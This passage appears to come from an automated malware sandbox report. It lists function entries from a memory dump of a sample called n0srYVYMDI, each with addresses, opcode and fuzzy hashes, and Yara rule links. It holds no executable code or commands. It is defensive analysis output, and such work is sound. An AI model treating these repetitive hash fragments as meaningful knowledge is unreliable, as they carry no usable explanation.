                                                                                                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                            • Instruction ID: d1b0814d7b8b2e2c5c030c4861ce7b58a3ed432923bd84cdeac1d509d0429e0c
                                                                                                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                            • Instruction Fuzzy Hash: 36F0FC332476339BD7331A594C44B2BE9958FD5A64F1B0075F7099B244CB648D0197D2
                                                                                                                                            Function 0182634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4b9bba43a886e115544db02995a70101b36c40642f5d9577433a86b2ea32a9f6
                                                                                                                                            • Instruction ID: f050b49a33c541ac052e7a58e34bc50cf62a262f467c46f60d744b0f2d724916
                                                                                                                                            • Opcode Fuzzy Hash: 4b9bba43a886e115544db02995a70101b36c40642f5d9577433a86b2ea32a9f6
                                                                                                                                            • Instruction Fuzzy Hash: 74012C71A10259AFDB04DFA9E955AAEB7F8FF58304F10406AE905E7350D6749A01CBA0
                                                                                                                                            Function 018262D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 040515a82029f5ed4f7841bc07e4ce2a5b0f2b77f44a6a615a77b9970ec14689
                                                                                                                                            • Instruction ID: 29ff525d0bcd945545d3fe7744efa6709d5764c5ca48e022cdfeebaadcdead6c
                                                                                                                                            • Opcode Fuzzy Hash: 040515a82029f5ed4f7841bc07e4ce2a5b0f2b77f44a6a615a77b9970ec14689
                                                                                                                                            • Instruction Fuzzy Hash: F5012171A00219AFDB04DFA9E5559AEB7F8EF58304F50405AE915E7390D6749E01CBA0
                                                                                                                                            Function 0182625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9c5de21d34d0c9798b97289e0c453c8b9769c6d911b975e46daf838cb3ffd8b4
                                                                                                                                            • Instruction ID: 03a58ab44316be20dfa60e038f3fcec45bb6e438cbbccdc5000a2e90a5989df1
                                                                                                                                            • Opcode Fuzzy Hash: 9c5de21d34d0c9798b97289e0c453c8b9769c6d911b975e46daf838cb3ffd8b4
                                                                                                                                            • Instruction Fuzzy Hash: 20017C71A0021AAFCB04DFA9E455AAEB7F8EF58304F10802AF905E7350D674AA01CBA0
                                                                                                                                            Function 0178CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                            • Instruction ID: f9822e29ab09969af2a2a07b66b199dfef80f73be1f5413011c028045815cb31
                                                                                                                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                            • Instruction Fuzzy Hash: 7501F4322406859BD323AB1DC809F99FB9CEF51B54F0840EDFE148B6A1D779CA40C222
                                                                                                                                            Function 018261E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a3a07134ce0d82564f0e0db148cba6bbefab0f7d44b46f63823867f5fd60da9a
                                                                                                                                            • Instruction ID: db1b481108e0561e7fdecb9b98ac396450eda44c6b1ffa2ee05f0a033fdb1dc5
                                                                                                                                            • Opcode Fuzzy Hash: a3a07134ce0d82564f0e0db148cba6bbefab0f7d44b46f63823867f5fd60da9a
                                                                                                                                            • Instruction Fuzzy Hash: F9017C71A002599BCB00DFA9E845AAEBBF8EF59314F14405AE901E7280E734EA01CB94
                                                                                                                                            Function 017D63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                            • Instruction ID: d65e01aa5818ca59424da1c2c22a58bc44bdc76151a2611dfc92603d44ac4b0d
                                                                                                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                            • Instruction Fuzzy Hash: E2F01D7220001DBFEF019F94DD80DEFBB7EEB592A8B104125FA1192164D635DE21ABA0
                                                                                                                                            Function 017DA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fcc8c6cdeced45e6e011db3490c9e27ebb01f403ab08943e19f2f47391c1c2ff
                                                                                                                                            • Instruction ID: ee94e9d706ac7ac023e250619623eb3986adbbc1d16d1dbef7cb5d986988f93a
                                                                                                                                            • Opcode Fuzzy Hash: fcc8c6cdeced45e6e011db3490c9e27ebb01f403ab08943e19f2f47391c1c2ff
                                                                                                                                            • Instruction Fuzzy Hash: 2E01853610020DABCF229E88D840EDE7F66FB4C664F068101FE19A6220C736DA70EF81
                                                                                                                                            Function 0174C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c8cd179e1aacb955dd1fe22d9fad60441ce69b19ae236aa3e892cbe9abedb790
                                                                                                                                            • Instruction ID: d18b8f61e70ba75f444249a638b35ec0cd6a40c317ea02b3e7468badc1a43859
                                                                                                                                            • Opcode Fuzzy Hash: c8cd179e1aacb955dd1fe22d9fad60441ce69b19ae236aa3e892cbe9abedb790
                                                                                                                                            • Instruction Fuzzy Hash: AAF024B12092519BF316961A9D01B22F296EBD4650F29807AEB058B2D1EB70DC0283A4
                                                                                                                                            Function 0178656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5de1627eaabfe6234f4b81c68868ada3816be11760aa3417d5de75660dd46689
                                                                                                                                            • Instruction ID: 71da05a22447eb89f052f837f4e56c1f02e509537c2b8f5e91201d42f8c5b10e
                                                                                                                                            • Opcode Fuzzy Hash: 5de1627eaabfe6234f4b81c68868ada3816be11760aa3417d5de75660dd46689
                                                                                                                                            • Instruction Fuzzy Hash: F401A970241685ABF323A76CCD5CF25F7E8BB50F44F540198BA419B5D6DB28D541C620
                                                                                                                                            Function 017F437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                            • Instruction ID: 543c90496af8f046c36cf0176b4cecca81d8e71c7d175d992e40803e0a62dedd
                                                                                                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                            • Instruction Fuzzy Hash: 83F0893574191347EB76AA2D9814B2BE6D5DF90A50B05052C9757EB780EF60D801C791
                                                                                                                                            Function 017DE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                            • Instruction ID: c9dafb13c40fad23eaa2b91393c24cd5ba818665c9a9f3ab3e4c11e882093591
                                                                                                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                            • Instruction Fuzzy Hash: 22F0BE327806129BE3229A4ECC81F16F7B8AFD5A60F190064AA089F664CB60EC41C7D0
                                                                                                                                            Function 017DC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d3644ea6e7f5c56f87fb9f856450c0b5089bb7607a2ad27d0b5d45b8d602580f
                                                                                                                                            • Instruction ID: 66fbcccbc8879fbceb1aa12a716fc49dc70b4e923155d6aeabfe9fee1e4b457b
                                                                                                                                            • Opcode Fuzzy Hash: d3644ea6e7f5c56f87fb9f856450c0b5089bb7607a2ad27d0b5d45b8d602580f
                                                                                                                                            • Instruction Fuzzy Hash: B0F0AF706053489FC710EF68C946E1AF7E8FF98714F40465EB898DB394EA34EA01CB96
                                                                                                                                            Function 01780854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                            • Instruction ID: c357566c8cac12563866dce7f966afe26bcca8b10ecacad166fcbf49708d16cc
                                                                                                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                            • Instruction Fuzzy Hash: 9AF02472650200AFE714EB26CC04F46F7E9EF9C340F148078A944C7174FAB0DD50D654
                                                                                                                                            Function 017DC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6dce8c023a6feaf55ea83f8bf991c5b8cffdd91234b46e848685fd03d6d4a91e
                                                                                                                                            • Instruction ID: bcbae7b79504f497332fabef15712ccef854907d75af37ca585a8615790276d2
                                                                                                                                            • Opcode Fuzzy Hash: 6dce8c023a6feaf55ea83f8bf991c5b8cffdd91234b46e848685fd03d6d4a91e
                                                                                                                                            • Instruction Fuzzy Hash: 8CF04F70A1124D9FCB04EFA9D515A6EF7B4EF18304F108059A955EB385DA34EA01CB50
                                                                                                                                            Function 017547FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c5a3475382a42a86323ddab01c37087a643234acd7ecfefb9b8d1c3521b480d2
                                                                                                                                            • Instruction ID: 9010c0409fc86bd65ff12d3eb4987b3f4a5e032465c8dce2c6ccee7afe0eb25c
                                                                                                                                            • Opcode Fuzzy Hash: c5a3475382a42a86323ddab01c37087a643234acd7ecfefb9b8d1c3521b480d2
                                                                                                                                            • Instruction Fuzzy Hash: 7CF0B4319966E99FE7B2CB5CC844B61FBD49B00734F08496ADD6B87502E7B4F8C0C651
                                                                                                                                            Function 01810115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 82c2aafb9c36da93595bb181f2b753312e929410676522e1d8b932dffc569031
                                                                                                                                            • Instruction ID: 9b6722cf310849c4e9b30c9130095ae5fcb023c6bbf7201a46ae6ad1f209faa1
                                                                                                                                            • Opcode Fuzzy Hash: 82c2aafb9c36da93595bb181f2b753312e929410676522e1d8b932dffc569031
                                                                                                                                            • Instruction Fuzzy Hash: 7AF0272F416AC457CB336B2C7C502D17F58A742314F291449D8A0D720AD9B88BC3CB21
                                                                                                                                            Function 0178C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a5fb07d775e9d66e7a06c1f8c7cc6fb95f463e289dc2065eae37a9f6bc02cc5a
                                                                                                                                            • Instruction ID: 9927c8bd02a11d2204bb73c7958d5b17f173800bb11d684c96dafe908ed5683d
                                                                                                                                            • Opcode Fuzzy Hash: a5fb07d775e9d66e7a06c1f8c7cc6fb95f463e289dc2065eae37a9f6bc02cc5a
                                                                                                                                            • Instruction Fuzzy Hash: F9F0E2717956519FE323B72CC148B91FBD8AB407B8F089476D406C7512C670E880CA71
                                                                                                                                            Function 01792619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                            • Instruction ID: cec3e044209af78510afec87d7f0de3f0c4aaafc1f1eb068637172af7c4c93e7
                                                                                                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                            • Instruction Fuzzy Hash: 6AE0D832300A012BEB11AE599CC4F47B76EDFD6B10F04007DBA045F656C9E2DC1DC2A4
                                                                                                                                            Function 017E6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                            • Instruction ID: 23cba91c8ca13f9576ee566492bc3fbe83bb450b8d986b538a2d79341c9ca4e9
                                                                                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                            • Instruction Fuzzy Hash: 28F030721042149FE3219F09D948F62FBF8EB19364F45C065F6099B561D37AEC40CBA4
                                                                                                                                            Function 01750710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                            • Instruction ID: abd62ff6b32b4993d4989d3e79dee9f40ba00c15ba1e035e50a436776f98dba8
                                                                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                            • Instruction Fuzzy Hash: 52F0ED3A2047499FEB56CF19D050AE9BBA8FB91360B000494FC468B351EB71EA82CB90
                                                                                                                                            Function 017849D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                            • Instruction ID: 6b8058f053cbc80e669d84416bd715bc4d97b21c9972151a1ca0c7a1e8256e8b
                                                                                                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                            • Instruction Fuzzy Hash: B8E0D832284147EBD7213A698808B66F7A9EBD47E0F154429E6428F150DBF0DD40D7D9
                                                                                                                                            Function 01824164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 543068bacd2ae032ab39a1511267982d92ee71018c7640e2bafb30286c4c5925
                                                                                                                                            • Instruction ID: cc9d65fb57fbaa0c15623695f910851eb0f8d47134b72f8fc208790c14d453a5
                                                                                                                                            • Opcode Fuzzy Hash: 543068bacd2ae032ab39a1511267982d92ee71018c7640e2bafb30286c4c5925
                                                                                                                                            • Instruction Fuzzy Hash: 29F0A031A259F14FE763D72CD144B5577E4AB10B30F6A05A4D400C7912C720DDC0C670
                                                                                                                                            Function 017F678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                            • Instruction ID: cf4c739d4d3e07477dc09e4522d3180e6a06a00cddc4bdad068639d1098ae3c2
                                                                                                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                            • Instruction Fuzzy Hash: FCE04F72A40114BBDF21A79A8D09F9BFEACDB94EA4F154059BB01EB194E570DE00D6A0
                                                                                                                                            Function 018208C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                            • Instruction ID: 31d6a3ec9d866711bbd79702b2ca308b84e1fb0884ff99ab5bdd7d93df4db8f8
                                                                                                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                            • Instruction Fuzzy Hash: 7CE09B316403648BCB268A1EC544A73B7E8DF95764F658069E90587752C271F9C2C6D0
                                                                                                                                            Function 017525E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: dc12c4512670a617a1b49d50150a1559cf81150338c098da0ef8d42a45794a1a
                                                                                                                                            • Instruction ID: d1245f0e348ef908b2e0559a3a86c0b448760002a7781310322a9e95811c973a
                                                                                                                                            • Opcode Fuzzy Hash: dc12c4512670a617a1b49d50150a1559cf81150338c098da0ef8d42a45794a1a
                                                                                                                                            • Instruction Fuzzy Hash: 97E02232000A80ABC322BB29DC05F8AB7EAEF60360F000514B41547198CB30A800C788
                                                                                                                                            Function 0180A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                            • Instruction ID: fcabd35126f249e48c69c62596eb8015d292860d8988039228a8f6d7286368ac
                                                                                                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                            • Instruction Fuzzy Hash: 18E06D31010B11DBEB366B2ADC4CB56BAE4AF50711F258C28A09A028F4C77499C0CA40
                                                                                                                                            Function 017D4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                            • Instruction ID: f6d2044c6b232162ec0709e1447fbff88aecc7194a7ab1ab85951cf26b15fbff
                                                                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                            • Instruction Fuzzy Hash: CBE0C2343003099FE715CF19C084B62BBB6BFD5A10F28C0A8A9498F605EB32E842CB50
                                                                                                                                            Function 0174823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
